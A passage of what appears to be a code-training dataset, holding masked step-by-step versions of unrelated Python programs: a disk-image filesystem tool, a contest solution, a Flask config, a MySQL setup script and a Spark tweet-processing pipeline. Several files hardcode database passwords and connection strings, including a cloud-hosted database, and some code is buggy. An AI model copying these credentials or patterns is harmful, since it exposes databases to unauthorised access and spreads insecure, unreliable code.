"step-5": "from sys import exit\nfrom os import stat\n\nfile = open(\"fiunamfs.img\",\"r\")\nnombre = file.read(8)\nfile.seek(10)\nversion = file.read(3)\nfile.seek(20)\netiqueta = file.read(15)\nfile.seek(40)\ncluster = file.read(5)\nfile.seek(47)\nnumero = file.read(2)\nfile.seek(52)\nnumeroCompleto = file.read(8)\nfile.close()\n\narchivos = []\ntams = []\nclusters = []\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu=clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca \n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell()+36)\n file.close()\n\ndef info():\n print(\"Nombre del Sistema: \" + nombre)\n print(\"Version: \" + version)\n print(\"Etiqueta del Volumen: \" + etiqueta)\n print(\"Tamano del cluster en bytes: \" + cluster)\n print(\"Numero de clusters que mide el directorio: \" + numero)\n print(\"Numero de cluster que mide la unidad completa: \" + numeroCompleto)\n\ndef listar():\n file = open(\"fiunamfs.img\",\"r\")\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell()+49)\n file.close()\n\ndef borrar(archivo):\n borrado = False\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell()-15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell()+49)\n file.close()\n return borrado\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\ndef dePcASistema(path, nombre):\n posicion =0\n actual =0\n try:\n new = open(path,\"r+\")\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while(bandera == False):\n name = file.read(15)\n if (name == 'Xx.xXx.xXx.xXx.'):\n file.seek(file.tell()-15)\n file.write(nombre)\n actual = file.tell()\n print(\"El archivo fue copiado\")\n bandera = True\n file.seek(file.tell()+49)\n file.close()\n file = open(\"fiunamfs.img\",\"r+\")\n pa = clusterVacio()\n inde = 2048*pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open(\"fiunamfs.img\",\"r+\")\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print(\"Este archivo no existe\")\n \ndef deSistemaAPc(archivo,nombre):\n tam = 0 \n clu = 0\n file = open(\"fiunamfs.img\",\"r\") #Se abre el archivo en modo solo lectura\n file.seek(2048) #Se salta el superbloque \n new = open(archivo,\"r+\")\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if (aux == nombre):\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048*clu\n file = open(\"fiunamfs.img\",\"r\")\n file.seek(aux2)\n new.write(file.read(tam))\n \n \ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if (path[i] == '/'):\n slash = i\n for i in range(slash+1,tam):\n name = name + path[i]\n ##Agregar funcion de limiar nombres de los archivos a 15 caracteres\n espaces = 15 - len(name)\n for i in range (espaces):\n name2 = name2 + \" \"\n return name2 + name\n \n\n \n\nif (nombre == \"FiUnamFS\" and version == \"0.7\"):\n correcto = True\n while(correcto):\n tablaArchivos()\n print(\"Sistema de Archivos FI Unam FS\")\n print(\"1: Listar\")\n print(\"2: Copiar archivo\")\n print(\"3: Copiar archivo a la computadora\")\n print(\"4: Eliminar archivo\")\n print(\"5: Desgramentar\")\n print(\"6: Mostar informacion del sistema de archivos\")\n print(\"7: Salir\")\n opcion = input(\"Opcion: \")\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input(\"Nombre del archivo a borrar: \")\n if(borrar(archivo)):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input(\"Nombre del archivo a copiar: \")\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input(\"Nombre del archivo a copiar: \")\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print (va)\n elif opcion == 7:\n print(\"Sistema desmontado\")\n correcto = False\n elif opcion == 5:\n print(\"No se implemento\")\nelse:\n print(\"No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.\")\n exit()\n\n \n\n\n",
"step-ids": [
8,
9,
10,
12,
13
]
}
|
[
8,
9,
10,
12,
13
] |
from collections import Counter
def main():
N = int(input())
A = tuple(map(int, input().split()))
c = Counter(A).most_common()
if c[0][0] == 0 and c[0][1] == N:
print("Yes")
elif len(c) == 2 and c[0][1] == 2*N//3 and c[1][0] == 0 and c[1][1] == N//3:
print("Yes")
elif len(c) == 3 and int(c[0][0])^int(c[1][0]) == int(c[2][0]) and c[0][1] == c[1][1] and c[1][1] == c[2][1]:
print("Yes")
else:
print("No")
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "7c6ada250770e04b395dda774a78042da69e2854",
"index": 8681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from collections import Counter\n\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n c = Counter(A).most_common()\n if c[0][0] == 0 and c[0][1] == N:\n print('Yes')\n elif len(c) == 2 and c[0][1] == 2 * N // 3 and c[1][0] == 0 and c[1][1\n ] == N // 3:\n print('Yes')\n elif len(c) == 3 and int(c[0][0]) ^ int(c[1][0]) == int(c[2][0]) and c[0][1\n ] == c[1][1] and c[1][1] == c[2][1]:\n print('Yes')\n else:\n print('No')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from collections import Counter\n\ndef main():\n N = int(input())\n A = tuple(map(int, input().split()))\n \n c = Counter(A).most_common()\n \n if c[0][0] == 0 and c[0][1] == N:\n print(\"Yes\")\n elif len(c) == 2 and c[0][1] == 2*N//3 and c[1][0] == 0 and c[1][1] == N//3:\n print(\"Yes\")\n elif len(c) == 3 and int(c[0][0])^int(c[1][0]) == int(c[2][0]) and c[0][1] == c[1][1] and c[1][1] == c[2][1]:\n print(\"Yes\")\n else:\n print(\"No\")\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'
] = 'postgresql://info2180-project1:password123@localhost/profilebook'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ['jpg', 'jpeg', 'png']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
app.config['SECRET_KEY'] = 'SuperSecretKey'
app.config['SQLALCHEMY_DATABASE_URI'
] = 'postgresql://info2180-project1:password123@localhost/profilebook'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ['jpg', 'jpeg', 'png']
from app import views
<|reserved_special_token_1|>
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
app.config['SECRET_KEY'] = "SuperSecretKey"
#app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r"
app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://info2180-project1:password123@localhost/profilebook"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ["jpg", "jpeg", "png"]
from app import views
|
flexible
|
{
"blob_id": "7b45c9e31bfb868b1abde6af0d8579b52f86d9c3",
"index": 5689,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SuperSecretKey'\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'postgresql://info2180-project1:password123@localhost/profilebook'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\nallowed_exts = ['jpg', 'jpeg', 'png']\n<mask token>\n",
"step-3": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom subprocess import call\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SuperSecretKey'\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'postgresql://info2180-project1:password123@localhost/profilebook'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\nallowed_exts = ['jpg', 'jpeg', 'png']\nfrom app import views\n",
"step-4": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom subprocess import call\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"SuperSecretKey\"\n#app.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r\"\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgresql://info2180-project1:password123@localhost/profilebook\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning\napp.config['UPLOAD_FOLDER'] = './app/static/profile_photo'\ndb = SQLAlchemy(app)\n\nallowed_exts = [\"jpg\", \"jpeg\", \"png\"]\n\nfrom app import views",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DB_NAME = 'PieDB'
TABLES = {}
TABLES['lemonpie'] = (
'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'
)
config = {'user': 'piemaster', 'password': 'piemaster123', 'host':
'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',
'raise_on_warnings': True}
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
TABLES['lemonpie'] = (
'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'
)
config = {'user': 'piemaster', 'password': 'piemaster123', 'host':
'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',
'raise_on_warnings': True}
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".
format(DB_NAME))
except mysql.connector.Error as err:
print('Failed creating database: {}'.format(err))
exit(1)
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
for name, ddl in TABLES.iteritems():
try:
print('Creating table {}: '.format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print('already exists.')
else:
print(err.msg)
else:
print('OK')
cursor.close()
cnx.close()
<|reserved_special_token_1|>
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
# TABLES['pietweets'] = (
# "CREATE TABLE `pietweets` ("
# " `id` int NOT NULL AUTO_INCREMENT,"
# " `tweet_id` bigint NOT NULL,"
# " `username` varchar(32) NOT NULL,"
# " `geo_lat` float(53) NOT NULL,"
# " `geo_long` float(53) NOT NULL,"
# " `text` varchar(255) NOT NULL,"
# " `timestamp` datetime NOT NULL,"
# " PRIMARY KEY (`id`)"
# ") ENGINE=InnoDB")
TABLES['lemonpie'] = (
"CREATE TABLE `lemonpie` ("
" `id` int NOT NULL AUTO_INCREMENT,"
" `tweet_id` bigint NOT NULL,"
" `username` varchar(32) NOT NULL,"
" `geo_lat` float(53) NOT NULL,"
" `geo_long` float(53) NOT NULL,"
" `text` varchar(255) NOT NULL,"
" `timestamp` datetime NOT NULL,"
" PRIMARY KEY (`id`)"
") ENGINE=InnoDB")
# DB credentials
config = {
'user': 'piemaster',
'password': 'piemaster123',
'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',
'database': 'PieDB',
'raise_on_warnings': True,
}
# establish connection with DB config credentials
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute(
"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(DB_NAME))
except mysql.connector.Error as err:
print("Failed creating database: {}".format(err))
exit(1)
# try connecting to designated DB, if not exist - create this DB
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
# iterate through TABLES and create each table
for name, ddl in TABLES.iteritems():
try:
print("Creating table {}: ".format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print("already exists.")
else:
print(err.msg)
else:
print("OK")
# closing db connection
cursor.close()
cnx.close()
|
flexible
|
{
"blob_id": "38abc4bc99f3b15b416c77481818464a6c7f11ef",
"index": 3844,
"step-1": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-3": "<mask token>\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-4": "import mysql.connector\nfrom mysql.connector import errorcode\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-5": "import mysql.connector\nfrom mysql.connector import errorcode\n\nDB_NAME = 'PieDB'\n\nTABLES = {}\n# TABLES['pietweets'] = (\n# \t\"CREATE TABLE `pietweets` (\"\n# \t\" `id` int NOT NULL AUTO_INCREMENT,\"\t\t\n# \t\" `tweet_id` bigint NOT NULL,\"\n# \t\" `username` varchar(32) NOT NULL,\"\n# \t\" `geo_lat` float(53) NOT NULL,\"\n# \t\" `geo_long` float(53) NOT NULL,\"\n# \t\" `text` varchar(255) NOT NULL,\"\n# \t\" `timestamp` datetime NOT NULL,\"\n# \t\" PRIMARY KEY (`id`)\"\n# \t\") ENGINE=InnoDB\")\nTABLES['lemonpie'] = (\n \"CREATE TABLE `lemonpie` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\" \n \" `tweet_id` bigint NOT NULL,\"\n \" `username` varchar(32) NOT NULL,\"\n \" `geo_lat` float(53) NOT NULL,\"\n \" `geo_long` float(53) NOT NULL,\"\n \" `text` varchar(255) NOT NULL,\"\n \" `timestamp` datetime NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\")\n\n# DB credentials\nconfig = {\n 'user': 'piemaster',\n 'password': 'piemaster123',\n 'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',\n 'database': 'PieDB',\n 'raise_on_warnings': True,\n}\n\n# establish connection with DB config credentials\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n\n# try connecting to designated DB, if not exist - create this DB\ntry:\n cnx.database = DB_NAME \nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n# iterate through TABLES and create each table\nfor name, ddl in TABLES.iteritems():\n try:\n print(\"Creating table {}: \".format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n# closing db connection\ncursor.close()\ncnx.close()\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
<|reserved_special_token_0|>
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
<|reserved_special_token_0|>
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
<|reserved_special_token_0|>
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
